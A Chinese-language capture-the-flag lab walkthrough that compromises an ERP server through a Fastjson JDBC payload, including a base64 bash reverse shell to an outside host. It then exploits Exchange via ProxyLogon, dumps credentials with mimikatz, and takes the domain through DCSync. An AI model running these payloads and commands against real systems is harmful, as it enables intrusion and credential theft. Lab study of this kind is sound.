知识点
Fastjson-JDBC ATTACK、Exchange proxylogon RCE、Dsync 攻击、MISC
Flag1
靶场地址:39.99.233.132
上手fscan嗦一把。
1 2 3 4 5 6 7 8 9 10 11 12
| fscan version: 1.7.1 start infoscan (icmp) Target 39.99.233.132 is alive [*] Icmp alive hosts len is: 1 39.99.233.132:80 open 39.99.233.132:8000 open 39.99.233.132:22 open [*] alive ports len is: 3 start vulscan [*] WebTitle:http://39.99.233.132 code:200 len:19813 title:lumia [*] WebTitle:http://39.99.233.132:8000 code:302 len:0 title:None 跳转url: http://39.99.233.132:8000/login.html [*] WebTitle:http://39.99.233.132:8000/login.html code:200 len:5662 title:Lumia ERP
|
发现了华夏ERP开在了8000端口
华夏erp账号密码泄露+后台rce(最新组合漏洞)
[http://39.99.233.132:8000/user/getAllList;.ico](http://39.99.233.132:8000/user/getAllList;.ico)
这里可以获取1管理员的账号密码,cmd5解密是123456
获得一组管理员账号密码admin/123456
https://www.cnblogs.com/bmjoker/p/14856437.html
后台搜索界面存在fastjson1.2.55的反序列化,然后题目给的考点是JDBC,去找点poc。
https://su18.org/post/fastjson/#8-fastjson-1268
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
| { "@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection", "hostToConnectTo": "114.116.119.253", "portToConnectTo": 3306, "url": "jdbc:mysql://114.116.119.253:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", "databaseToConnectTo": "test", "info": { "@type": "java.util.Properties", "PORT": "3306", "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", "autoDeserialize": "true", "user": "base64ZGVzZXJfQ0MzMV9iYXNoIC1jIHtlY2hvLFltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDOHhNVFF1TVRFMkxqRXhPUzR5TlRNdk56YzNOeUF3UGlZeH18e2Jhc2U2NCwtZH18e2Jhc2gsLWl9", "PORT.1": "3306", "HOST.1": "172.20.64.40", "NUM_HOSTS": "1", "HOST": "172.20.64.40", "DBNAME": "test" } }
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14
| GET /user/list?search=%7B%0A%09%22%40type%22%3A%20%22java.lang.AutoCloseable%22%2C%0A%09%22%40type%22%3A%20%22com.mysql.jdbc.JDBC4Connection%22%2C%0A%09%22hostToConnectTo%22%3A%20%22114.116.119.253%22%2C%0A%09%22portToConnectTo%22%3A%203308%2C%0A%09%22url%22%3A%20%22jdbc%3Amysql%3A%2F%2F114.116.119.253%3A3308%2Ftest%3FautoDeserialize%3Dtrue%26statementInterceptors%3Dcom.mysql.jdbc.interceptors.ServerStatusDiffInterceptor%22%2C%0A%09%22databaseToConnectTo%22%3A%20%22test%22%2C%0A%09%22info%22%3A%20%7B%0A%09%09%22%40type%22%3A%20%22java.util.Properties%22%2C%0A%09%09%22PORT%22%3A%20%223306%22%2C%0A%09%09%22statementInterceptors%22%3A%20%22com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor%22%2C%0A%09%09%22autoDeserialize%22%3A%20%22true%22%2C%0A%09%09%22user%22%3A%20%22base64ZGVzZXJfQ0MzMV9iYXNoIC1jIHtlY2hvLFltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDOHhNVFF1TVRFMkxqRXhPUzR5TlRNdk56YzNOeUF3UGlZeH18e2Jhc2U2NCwtZH18e2Jhc2gsLWl9%22%2C%0A%09%09%22PORT.1%22%3A%20%223306%22%2C%0A%09%09%22HOST.1%22%3A%20%22172.20.64.40%22%2C%0A%09%09%22NUM_HOSTS%22%3A%20%221%22%2C%0A%09%09%22HOST%22%3A%20%22172.20.64.40%22%2C%0A%09%09%22DBNAME%22%3A%20%22test%22%0A%09%7D%0A%7D¤tPage=1&pageSize=10 HTTP/1.1 Host: 39.99.233.132:8000 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Edg/118.0.2088.46 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://39.99.233.132:8000/login.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Cookie: JSESSIONID=B49FB20B635BD8913377199CAAED066E; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1697723127; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1697724188 If-Modified-Since: Sun, 23 Oct 2022 11:30:06 GMT Connection: close
|
获取到了一个webshell。接下来咱们想给他持久化一下。我选择上个vshell
先拿个flag
然后咱们在vhsell上等待服务器的上线即可。
Flag2
上线过后我们首先上传个fscan上去进行后渗透。
1 2 3 4 5 6 7 8
| [*] 172.22.3.9 XIAORANG\XIAORANG-EXC01 Windows Server 2016 Datacenter 14393 [*] WebTitle:http://172.22.3.12:8000 code:302 len:0 title:None 跳转url: http://172.22.3.12:8000/login.html [*] WebTitle:http://172.22.3.12:8000/login.html code:200 len:5662 title:Lumia ERP [*] WebTitle:http://172.22.3.9:81 code:403 len:1157 title:403 - 禁止访问: 访问被拒绝。 [*] WebTitle:https://172.22.3.9:8172 code:404 len:0 title:None [*] WebTitle:http://172.22.3.9 code:403 len:0 title:None [*] WebTitle:https://172.22.3.9 code:302 len:0 title:None 跳转url: https://172.22.3.9/owa/ [*] WebTitle:https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237 title:Outlook
|
https://172.22.3.9
我们看到了一个Outlook,结合靶机名称考虑的是Exchange的logon写shell的洞
但在这之前我们首先穿一层代理出来先,vshell提供了方便的隧道搭建,我们开一层socks5,然后配置一下自己的proxychains
配置完毕,咱们掏出exp去打!
https://github.com/hausec/ProxyLogon
python2去用这个exp。
proxychains python2 exchange-rce.py 172.22.3.9 [email protected]
但是这样始终不方便拿shell。所以启动一下蚁剑
记得开忽略https证书捏
然后进一步我们需要做个权限维持。也是上vshell,但是不出网。所以只能用蚁剑来办事情。
Flag4
windows域渗透的流程,首先我们当前用户是一个system高权限账号,是可以直接进行mimiktaz的操作的。先fscan扫一下,然后顺路把mimikatz也传上去
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355
| C:\迅雷下载> type 1.log .#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( [email protected] ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz(commandline) # privilege::debug ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 mimikatz(commandline) # sekurlsa::logonpasswords Authentication Id : 0 ; 2394476 (00000000:0024896c) Session : RemoteInteractive from 2 User Name : Zhangtong Domain : XIAORANG Logon Server : XIAORANG-WIN16 Logon Time : 2023/10/19 21:46:20 SID : S-1-5-21-533686307-2117412543-4200729784-1147 msv : [00000003] Primary * Username : Zhangtong * Domain : XIAORANG * NTLM : 22c7f81993e96ac83ac2f3f1903de8b4 * SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e * DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b tspkg : wdigest : * Username : Zhangtong * Domain : XIAORANG * Password : (null) kerberos : * Username : Zhangtong * Domain : XIAORANG.LAB * Password : (null) ssp : credman : Authentication Id : 0 ; 104787 (00000000:00019953) Session : Service from 0 User Name : Zhangtong Domain : XIAORANG Logon Server : XIAORANG-WIN16 Logon Time : 2023/10/19 21:44:10 SID : S-1-5-21-533686307-2117412543-4200729784-1147 msv : [00000003] Primary * Username : Zhangtong * Domain : XIAORANG * NTLM : 22c7f81993e96ac83ac2f3f1903de8b4 * SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e * DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b tspkg : wdigest : * Username : Zhangtong * Domain : XIAORANG * Password : (null) kerberos : * Username : Zhangtong * Domain : XIAORANG.LAB * Password : (null) ssp : credman : Authentication Id : 0 ; 104855 (00000000:00019997) Session : Service from 0 User Name : Zhangtong Domain : XIAORANG Logon Server : XIAORANG-WIN16 Logon Time : 2023/10/19 21:44:10 SID : S-1-5-21-533686307-2117412543-4200729784-1147 msv : [00000003] Primary * Username : Zhangtong * Domain : XIAORANG * NTLM : 22c7f81993e96ac83ac2f3f1903de8b4 * SHA1 : 4d205f752e28b0a13e7a2da2a956d46cb9d9e01e * DPAPI : ed14c3c4ef895b1d11b04fb4e56bb83b tspkg : wdigest : * Username : Zhangtong * Domain : XIAORANG * Password : (null) kerberos : * Username : Zhangtong * Domain : XIAORANG.LAB * Password : (null) ssp : credman : Authentication Id : 0 ; 63573 (00000000:0000f855) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 2023/10/19 21:44:08 SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : XIAORANG-EXC01$ * Domain : XIAORANG * NTLM : 46c981f71101f966f05c247c73483379 * SHA1 : 3c091d00f75daa08bf846636924b3e11977b38d3 tspkg : wdigest : * Username : XIAORANG-EXC01$ * Domain : XIAORANG * Password : (null) kerberos : * Username : XIAORANG-EXC01$ * Domain : xiaorang.lab * Password : f7 78 46 cb 83 85 97 87 68 d8 37 f9 7b d6 85 40 0e 2b 12 2f f3 ba 19 dc f2 6f 3f 45 ff e5 77 bb e9 32 24 95 4f 8d 27 85 83 32 24 f3 23 48 16 ad fc 61 4a 4e 83 61 0f 0b 17 5c eb 82 d6 27 de 64 59 96 0a f3 e0 85 3a a8 d5 b7 3e c1 cc da 4d ed d2 1c 13 26 2a cd 48 f4 34 64 64 5d ed a4 b5 19 0d 3e 62 4b 09 71 73 11 90 ce 4a 69 37 de 53 85 e1 9c be b2 14 33 67 01 9e f8 f3 bc 92 ce 1b b5 40 16 ab b8 a7 f6 7b 32 0a 17 22 71 a4 22 25 c1 f9 84 66 dc fd b9 4f b7 5d 2d d2 6e 23 58 54 c2 55 78 cc 64 8e a3 48 65 f2 dd e5 bf 76 49 c6 7a 1f b2 6a 09 ec 40 c1 a3 83 11 0a 10 12 f8 8f d7 ee ee 8b 81 04 4f b3 5a 6c 63 6a 49 76 71 0a 58 5c 31 f2 2d 97 2d be 8e 84 22 ae 29 10 3a 63 66 17 7d cb 3b 17 7c 4f 8a ff d1 db b0 1e 82 64 e6 ssp : credman : Authentication Id : 0 ; 10511454 (00000000:00a0645e) Session : NetworkCleartext from 0 User Name : HealthMailbox0d5918e Domain : XIAORANG Logon Server : XIAORANG-WIN16 Logon Time : 2023/10/19 22:25:26 SID : S-1-5-21-533686307-2117412543-4200729784-1136 msv : [00000003] Primary * Username : HealthMailbox0d5918e * Domain : XIAORANG * NTLM : 24ede8bf5898e43b56afa207ee5b42d2 * SHA1 : 5fa54554e61298d10a8aab3565d17cb17d84fb5a * DPAPI : d3eae48eca56207938fc8ef39add245a tspkg : wdigest : * Username : HealthMailbox0d5918e * Domain : XIAORANG * Password : (null) kerberos : * Username : HealthMailbox0d5918e * Domain : XIAORANG.LAB * Password : (null) ssp : credman : Authentication Id : 0 ; 2328428 (00000000:0023876c) Session : Interactive from 2 User Name : DWM-2 Domain : Window Manager Logon Server : (null) Logon Time : 2023/10/19 21:46:18 SID : S-1-5-90-0-2 msv : [00000003] Primary * Username : XIAORANG-EXC01$ * Domain : XIAORANG * NTLM : 46c981f71101f966f05c247c73483379 * SHA1 : 3c091d00f75daa08bf846636924b3e11977b38d3 tspkg : wdigest : * Username : XIAORANG-EXC01$ * Domain : XIAORANG * Password : (null) kerberos : * Username : XIAORANG-EXC01$ * Domain : xiaorang.lab * Password : f7 78 46 cb 83 85 97 87 68 d8 37 f9 7b d6 85 40 0e 2b 12 2f f3 ba 19 dc f2 6f 3f 45 ff e5 77 bb e9 32 24 95 4f 8d 27 85 83 32 24 f3 23 48 16 ad fc 61 4a 4e 83 61 0f 0b 17 5c eb 82 d6 27 de 64 59 96 0a f3 e0 85 3a a8 d5 b7 3e c1 cc da 4d ed d2 1c 13 26 2a cd 48 f4 34 64 64 5d ed a4 b5 19 0d 3e 62 4b 09 71 73 11 90 ce 4a 69 37 de 53 85 e1 9c be b2 14 33 67 01 9e f8 f3 bc 92 ce 1b b5 40 16 ab b8 a7 f6 7b 32 0a 17 22 71 a4 22 25 c1 f9 84 66 dc fd b9 4f b7 5d 2d d2 6e 23 58 54 c2 55 78 cc 64 8e a3 48 65 f2 dd e5 bf 76 49 c6 7a 1f b2 6a 09 ec 40 c1 a3 83 11 0a 10 12 f8 8f d7 ee ee 8b 81 04 4f b3 5a 6c 63 6a 49 76 71 0a 58 5c 31 f2 2d 97 2d be 8e 84 22 ae 29 10 3a 63 66 17 7d cb 3b 17 7c 4f 8a ff d1 db b0 1e 82 64 e6 ssp : credman : Authentication Id : 0 ; 995 (00000000:000003e3) Session : Service from 0 User Name : IUSR Domain : NT AUTHORITY Logon Server : (null) Logon Time : 2023/10/19 21:44:10 SID : S-1-5-17 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : ssp : credman : Authentication Id : 0 ; 63606 (00000000:0000f876) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 2023/10/19 21:44:08 SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : XIAORANG-EXC01$ * Domain : XIAORANG * NTLM : 9587463cfa3fd1ea760c401e2c52e224 * SHA1 : 162fc915ffccfa73c6f53b3c92f02690ccf7831c tspkg : wdigest : * Username : XIAORANG-EXC01$ * Domain : XIAORANG * Password : (null) kerberos : * Username : XIAORANG-EXC01$ * Domain : xiaorang.lab * Password : 12 ae e6 f2 22 80 c0 a3 cd 84 c9 94 de ef 96 52 79 ff ea 99 f6 9c 67 48 10 08 e7 99 1a fa 51 11 ad b6 c1 79 cc 6d 04 b2 22 01 47 b0 53 b5 7e ff df 04 21 34 ae 7b ee c9 cf b1 c1 d3 c0 63 d3 d7 6a f2 3a 38 83 ac cf d2 93 7b d3 0b bb d6 a5 8d 7c cd f1 77 65 0b 8c 77 dd 98 49 3c 21 f0 5d fc a7 8f c7 e0 5b f7 96 4d d2 46 14 81 8f 4f a7 a4 27 11 09 03 f9 f4 0d ce 71 4d 8d 64 c3 a9 6b 5c 4a 77 ba ac 33 1a 49 60 11 bd 4d b2 1e 98 05 1a c1 03 5b c6 cf 4e 1c d3 83 10 52 51 68 c4 b1 e0 65 c2 36 f3 a6 3f 66 c6 95 8c 3d 47 ab 9b cb 35 bd 53 f0 6f 13 ae 48 28 5e cf 5b ee 45 ce 7f 10 47 aa e6 f0 d3 09 c0 b3 ad ef 24 00 c5 c8 f0 7f a5 06 93 0e f5 a4 2a ec d0 25 96 4d a4 88 d3 55 94 d9 94 81 ef 8b ba 9e 89 b6 36 dc 88 64 8d 96 ssp : credman : Authentication Id : 0 ; 22399 (00000000:0000577f) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) Logon Time : 2023/10/19 21:43:58 SID : msv : [00000003] Primary * Username : XIAORANG-EXC01$ * Domain : XIAORANG * NTLM : 46c981f71101f966f05c247c73483379 * SHA1 : 3c091d00f75daa08bf846636924b3e11977b38d3 tspkg : wdigest : kerberos : ssp : [00000000] * Username : [email protected] * Domain : (null) * Password : &k$@DY98tIt>P.Ydx2!Xl=h(2XWQB}wu9]Xi3RZ=hQyV{0iSp-9?EmAxZf{GY}Dx0cpEv{kGj5OUjq}x(v!_Y_*Ke0kg&{|32}r15W2Lq}oE1H59a-l4N$|55dU#GyyD credman : Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 User Name : XIAORANG-EXC01$ Domain : XIAORANG Logon Server : (null) Logon Time : 2023/10/19 21:43:58 SID : S-1-5-18 msv : tspkg : wdigest : * Username : XIAORANG-EXC01$ * Domain : XIAORANG * Password : (null) kerberos : * Username : xiaorang-exc01$ * Domain : XIAORANG.LAB * Password : (null) ssp : credman : Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : XIAORANG-EXC01$ Domain : XIAORANG Logon Server : (null) Logon Time : 2023/10/19 21:44:08 SID : S-1-5-20 msv : [00000003] Primary * Username : XIAORANG-EXC01$ * Domain : XIAORANG * NTLM : 46c981f71101f966f05c247c73483379 * SHA1 : 3c091d00f75daa08bf846636924b3e11977b38d3 tspkg : wdigest : * Username : XIAORANG-EXC01$ * Domain : XIAORANG * Password : (null) kerberos : * Username : xiaorang-exc01$ * Domain : XIAORANG.LAB * Password : (null) ssp : credman : Authentication Id : 0 ; 10115413 (00000000:009a5955) Session : NetworkCleartext from 0 User Name : HealthMailbox0d5918e Domain : XIAORANG Logon Server : XIAORANG-WIN16 Logon Time : 2023/10/19 22:24:49 SID : S-1-5-21-533686307-2117412543-4200729784-1136 msv : [00000003] Primary * Username : HealthMailbox0d5918e * Domain : XIAORANG * NTLM : 24ede8bf5898e43b56afa207ee5b42d2 * SHA1 : 5fa54554e61298d10a8aab3565d17cb17d84fb5a * DPAPI : d3eae48eca56207938fc8ef39add245a tspkg : wdigest : * Username : HealthMailbox0d5918e * Domain : XIAORANG * Password : (null) kerberos : * Username : HealthMailbox0d5918e * Domain : XIAORANG.LAB * Password : (null) ssp : credman : Authentication Id : 0 ; 9467606 (00000000:009076d6) Session : Service from 0 User Name : DefaultAppPool Domain : IIS APPPOOL Logon Server : (null) Logon Time : 2023/10/19 22:11:36 SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 msv : [00000003] Primary * Username : XIAORANG-EXC01$ * Domain : XIAORANG * NTLM : 46c981f71101f966f05c247c73483379 * SHA1 : 3c091d00f75daa08bf846636924b3e11977b38d3 tspkg : wdigest : * Username : XIAORANG-EXC01$ * Domain : XIAORANG * Password : (null) kerberos : * Username : XIAORANG-EXC01$ * Domain : xiaorang.lab * Password : f7 78 46 cb 83 85 97 87 68 d8 37 f9 7b d6 85 40 0e 2b 12 2f f3 ba 19 dc f2 6f 3f 45 ff e5 77 bb e9 32 24 95 4f 8d 27 85 83 32 24 f3 23 48 16 ad fc 61 4a 4e 83 61 0f 0b 17 5c eb 82 d6 27 de 64 59 96 0a f3 e0 85 3a a8 d5 b7 3e c1 cc da 4d ed d2 1c 13 26 2a cd 48 f4 34 64 64 5d ed a4 b5 19 0d 3e 62 4b 09 71 73 11 90 ce 4a 69 37 de 53 85 e1 9c be b2 14 33 67 01 9e f8 f3 bc 92 ce 1b b5 40 16 ab b8 a7 f6 7b 32 0a 17 22 71 a4 22 25 c1 f9 84 66 dc fd b9 4f b7 5d 2d d2 6e 23 58 54 c2 55 78 cc 64 8e a3 48 65 f2 dd e5 bf 76 49 c6 7a 1f b2 6a 09 ec 40 c1 a3 83 11 0a 10 12 f8 8f d7 ee ee 8b 81 04 4f b3 5a 6c 63 6a 49 76 71 0a 58 5c 31 f2 2d 97 2d be 8e 84 22 ae 29 10 3a 63 66 17 7d cb 3b 17 7c 4f 8a ff d1 db b0 1e 82 64 e6 ssp : credman : Authentication Id : 0 ; 2328450 (00000000:00238782) Session : Interactive from 2 User Name : DWM-2 Domain : Window Manager Logon Server : (null) Logon Time : 2023/10/19 21:46:18 SID : S-1-5-90-0-2 msv : [00000003] Primary * Username : XIAORANG-EXC01$ * Domain : XIAORANG * NTLM : 46c981f71101f966f05c247c73483379 * SHA1 : 3c091d00f75daa08bf846636924b3e11977b38d3 tspkg : wdigest : * Username : XIAORANG-EXC01$ * Domain : XIAORANG * Password : (null) kerberos : * Username : XIAORANG-EXC01$ * Domain : xiaorang.lab * Password : f7 78 46 cb 83 85 97 87 68 d8 37 f9 7b d6 85 40 0e 2b 12 2f f3 ba 19 dc f2 6f 3f 45 ff e5 77 bb e9 32 24 95 4f 8d 27 85 83 32 24 f3 23 48 16 ad fc 61 4a 4e 83 61 0f 0b 17 5c eb 82 d6 27 de 64 59 96 0a f3 e0 85 3a a8 d5 b7 3e c1 cc da 4d ed d2 1c 13 26 2a cd 48 f4 34 64 64 5d ed a4 b5 19 0d 3e 62 4b 09 71 73 11 90 ce 4a 69 37 de 53 85 e1 9c be b2 14 33 67 01 9e f8 f3 bc 92 ce 1b b5 40 16 ab b8 a7 f6 7b 32 0a 17 22 71 a4 22 25 c1 f9 84 66 dc fd b9 4f b7 5d 2d d2 6e 23 58 54 c2 55 78 cc 64 8e a3 48 65 f2 dd e5 bf 76 49 c6 7a 1f b2 6a 09 ec 40 c1 a3 83 11 0a 10 12 f8 8f d7 ee ee 8b 81 04 4f b3 5a 6c 63 6a 49 76 71 0a 58 5c 31 f2 2d 97 2d be 8e 84 22 ae 29 10 3a 63 66 17 7d cb 3b 17 7c 4f 8a ff d1 db b0 1e 82 64 e6 ssp : credman : Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 2023/10/19 21:44:08 SID : S-1-5-19 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : * Username : (null) * Domain : (null) * Password : (null) ssp : credman :
|
信息被我们dump下来了全部。我们可以获取xiaorang用户的NTML HASH,这一步可以进行pth喷洒攻击
似乎是因为SMB没开启,不过没关系,这时候就需要用到bloodhound进行一个信息搜集了
sharphound.exe -c all
拿下来导入bloodhound然后进行分析,等待过程是比较慢的,毕竟neo4j嘛。。
偷一下XZ的图,妈的我的bloodhound上传json文件卡了,真恶心
Dsync Dump
https://github.com/CravateRouge/bloodyAD
用到个方便点的工具,方便利用WriteDacl权限去添加dsync权限进而dump hashes
既然有writedacl权限,那就可以给域内任意用户添加任意dacl权限了,这里给zhangtong用户添加dsync权限,我们现在的机子是XIAORANG-EXC01,是Exchange组的成员,因此也有writedacl权限
proxychains dacledit.py xiaorang.lab/XIAORANG-EXC01 -hashes :46c981f71101f966f05c247c73483379 -action write -rights DCSync -principal Zhangtong -target-dn 'dc=xiaorang,dc=lab' -dc-ip 172.22.3.2
但我其实不是这样写的。这一波我觉得其实可以直接给当前机子,也就是自身dsync权限,然后用mimikatz直接dump就行了
proxychains dacledit.py xiaorang.lab/XIAORANG-EXC01$ -hashes :46c981f71101f966f05c247c73483379 -action write -rights DCSync -principal XIAORANG-EXC01$ -target-dn 'dc=xiaorang,dc=lab' -dc-ip 172.22.3.2
-hashes 当前机子的hash
-action 行为是添加也就是write
-principal 目标用户
-target-dn 域名
dc-ip 域控的ip
域控的ip我们fscan的结果看到了
那么接下来用mimikatz直接dump一下捏
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" >5.log
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90
| mimikatz # C:\迅雷下载> mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" >5.log C:\迅雷下载> type 5.log .#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( [email protected] ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz(commandline) # privilege::debug ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 mimikatz(commandline) # lsadump::dcsync /domain:xiaorang.lab /user:Administrator [DC] 'xiaorang.lab' will be the domain [DC] 'XIAORANG-WIN16.xiaorang.lab' will be the DC server [DC] 'Administrator' will be the user account Object RDN : Administrator ** SAM ACCOUNT ** SAM Username : Administrator User Principal Name : [email protected] Account Type : 30000000 ( USER_OBJECT ) User Account Control : 00000200 ( NORMAL_ACCOUNT ) Account expiration : 1601/1/1 8:00:00 Password last change : 2023/10/19 21:43:49 Object Security ID : S-1-5-21-533686307-2117412543-4200729784-500 Object Relative ID : 500 Credentials: Hash NTLM: 7acbc09a6c0efd81bfa7d5a1d4238beb ntlm- 0: 7acbc09a6c0efd81bfa7d5a1d4238beb ntlm- 1: 7acbc09a6c0efd81bfa7d5a1d4238beb ntlm- 2: 7acbc09a6c0efd81bfa7d5a1d4238beb ntlm- 3: 7acbc09a6c0efd81bfa7d5a1d4238beb lm - 0: f2ec8e584adb61457cfe4f77ea486895 lm - 1: 0f3223fca69c1d65a67c729a74e20a42 lm - 2: eae2ede2edea9c03fdd0c6e236646d41 Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : e5b0c4a82f7fbf0708b67d701a6aa8b0 * Primary:Kerberos-Newer-Keys * Default Salt : XIAORANG.LABAdministrator Default Iterations : 4096 Credentials aes256_hmac (4096) : d35b5e1dedca8060e674610041c5095c853724ca50c986c909a955b15fadf630 aes128_hmac (4096) : 8b17084cfa8d1c1d37c13201d68ec0cf des_cbc_md5 (4096) : d9c4a4d5348f0d73 OldCredentials aes256_hmac (4096) : d35b5e1dedca8060e674610041c5095c853724ca50c986c909a955b15fadf630 aes128_hmac (4096) : 8b17084cfa8d1c1d37c13201d68ec0cf des_cbc_md5 (4096) : d9c4a4d5348f0d73 OlderCredentials aes256_hmac (4096) : d35b5e1dedca8060e674610041c5095c853724ca50c986c909a955b15fadf630 aes128_hmac (4096) : 8b17084cfa8d1c1d37c13201d68ec0cf des_cbc_md5 (4096) : d9c4a4d5348f0d73 * Primary:Kerberos * Default Salt : XIAORANG.LABAdministrator Credentials des_cbc_md5 : d9c4a4d5348f0d73 OldCredentials des_cbc_md5 : d9c4a4d5348f0d73 * Packages * NTLM-Strong-NTOWF * Primary:WDigest * 01 e09c3dfc9c6efe284d857c058dc1db55 02 fbf9a181b276a735c3aa2dadd77e134c 03 abfd5c1956c049d4790c90d77e679564 04 e09c3dfc9c6efe284d857c058dc1db55 05 01b9558961ba8e6d3e242ad0a573daaf 06 421fafa7082865ce50c3d8f5a09172aa 07 3b33abf4513bdc142aeff14dcc44bb6c 08 67801cafacc256dbffa5b6550f3eb98d 09 eca500dc4bf4100b73d1adcbdc4fdef6 10 dc6a3d5522ca864a8668b3c1a49255b1 11 d692f02402a8f38e6c242af609bedc45 12 67801cafacc256dbffa5b6550f3eb98d 13 2c4c7abb5884d0554c33a355a9f7c21e 14 299c1210a681d700eb7840ce54808648 15 94dd87c64e01028a3d5f07af9ea9aa76 16 36e79452fc63c6af5f08f158fb788622 17 afc9d511a5dfcf8e41fa37f38ecc6af7 18 fd2dbb5552b731a4a78c103dfe64e3f1 19 db7b0bbeb4937dcb8ce461265a10b21e 20 7358a3b9387c41e5da0b7f2d769fe5d2 21 b9d78e29e532a095144a1eb0c829b255 22 192b18e2b0cd9b907936385b8bda7b36 23 ba08bed581e1da740999962c6a39ae91 24 f4afecc454a2b6decc5e9a934ba5db4b 25 f095e8a655cad918f5606bb764daea95 26 702cbf78e979f2914a877d8c53f18862 27 bbca37af1d189426db4899dc8f750150 28 ef2d30ad6765b5f13c65ade611e33312 29 b0aa1ed6b84d876eb160b8f30c5b40a4
|
然后psexec登上去捏
拿下捏
Flag3
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab" >7.log
在lumia用户有个secret.zip,纯纯misc我就不做了。。。
时间就是金钱啊!
flag{cf0c753c-233f-4729-8984-0746ea5878b7}